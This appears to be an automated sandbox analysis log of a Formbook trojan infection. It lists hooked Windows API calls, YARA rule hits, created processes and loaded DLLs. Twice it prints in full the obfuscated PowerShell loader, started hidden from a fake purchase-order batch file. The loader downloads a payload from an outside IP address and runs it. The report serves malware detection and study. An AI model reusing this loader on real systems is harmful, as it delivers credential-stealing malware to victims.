Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2CF0 NtDelayExecution,LdrInitializeThunk, 15_2_04AE2CF0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2C30 NtMapViewOfSection,LdrInitializeThunk, 15_2_04AE2C30
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2C50 NtUnmapViewOfSection,LdrInitializeThunk, 15_2_04AE2C50
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2DA0 NtReadVirtualMemory,LdrInitializeThunk, 15_2_04AE2DA0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2D10 NtQuerySystemInformation,LdrInitializeThunk, 15_2_04AE2D10
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2ED0 NtResumeThread,LdrInitializeThunk, 15_2_04AE2ED0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2E00 NtQueueApcThread,LdrInitializeThunk, 15_2_04AE2E00
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2E50 NtCreateSection,LdrInitializeThunk, 15_2_04AE2E50
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2FB0 NtSetValueKey,LdrInitializeThunk, 15_2_04AE2FB0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2F00 NtCreateFile,LdrInitializeThunk, 15_2_04AE2F00
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE38D0 NtGetContextThread,LdrInitializeThunk, 15_2_04AE38D0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE29F0 NtReadFile,LdrInitializeThunk, 15_2_04AE29F0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2A80 NtClose,LdrInitializeThunk, 15_2_04AE2A80
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2AC0 NtEnumerateValueKey,LdrInitializeThunk, 15_2_04AE2AC0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2A10 NtWriteFile,LdrInitializeThunk, 15_2_04AE2A10
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2B80 NtCreateKey,LdrInitializeThunk, 15_2_04AE2B80
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2B90 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_04AE2B90
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2BC0 NtQueryInformationToken,LdrInitializeThunk, 15_2_04AE2BC0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2B00 NtQueryValueKey,LdrInitializeThunk, 15_2_04AE2B00
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2B10 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_04AE2B10
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE3C90 NtOpenThread, 15_2_04AE3C90
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2CD0 NtEnumerateKey, 15_2_04AE2CD0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2C20 NtSetInformationFile, 15_2_04AE2C20
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE3C30 NtOpenProcessToken, 15_2_04AE3C30
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2C10 NtOpenProcess, 15_2_04AE2C10
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2DC0 NtAdjustPrivilegesToken, 15_2_04AE2DC0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2D50 NtWriteVirtualMemory, 15_2_04AE2D50
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2EB0 NtProtectVirtualMemory, 15_2_04AE2EB0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2E80 NtCreateProcessEx, 15_2_04AE2E80
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2EC0 NtQuerySection, 15_2_04AE2EC0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2F30 NtOpenDirectoryObject, 15_2_04AE2F30
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE29D0 NtWaitForSingleObject, 15_2_04AE29D0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2AA0 NtQueryInformationFile, 15_2_04AE2AA0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2BE0 NtQueryVirtualMemory, 15_2_04AE2BE0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2B20 NtQueryInformationProcess, 15_2_04AE2B20
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC8AD0 NtReadFile, 15_2_02AC8AD0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC8B90 NtDeleteFile, 15_2_02AC8B90
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC89A0 NtCreateFile, 15_2_02AC89A0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC8C10 NtClose, 15_2_02AC8C10
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC8D50 NtAllocateVirtualMemory, 15_2_02AC8D50
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: String function: 04A9B910 appears 266 times
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: String function: 04AF7BE4 appears 88 times
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: String function: 04B2EF10 appears 105 times
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: String function: 04AE5050 appears 35 times
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: String function: 04B1E692 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 23335050 appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2336E692 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 23347BE4 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2337EF10 appears 98 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 232EB910 appears 265 times
Source: amsi32_2316.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3124, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2316, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.evad.winBAT@20/10@6/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Prezygomatic.Ben
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:304:WilStaging_02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4pf1vrk.5pf.ps1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_La-Tanerie04180240124.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3124
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2316
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. 
') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. 
') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\AtBroker.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
